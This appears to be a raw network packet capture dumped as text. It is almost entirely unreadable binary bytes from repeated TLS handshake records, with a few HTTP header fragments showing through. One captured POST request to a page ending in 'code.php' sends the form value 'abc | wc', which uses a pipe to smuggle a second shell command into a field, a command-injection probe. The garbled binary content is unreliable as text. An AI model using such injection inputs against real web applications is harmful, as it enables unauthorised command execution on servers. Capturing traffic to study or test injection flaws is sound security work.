.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... .@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... .@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... .@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......)..K..9`..9..U.J....D..h.A..\(..\kB..-N.|+...-tp...H.(..|.qI...U..:...k...C.....a.-o,...r#[.9...........................................h2.http/1.1uP.........
.
..................n$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... .@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
..............................................mage/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9,en-US;q=0.8,en;q=0.7,ca;q=0.6

l|.&C
..c...=s$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... .@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... $.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
..............................................code.php
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

text=abc+%7C+wc..wP$.=.l>..V..r$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... $.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... .@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#

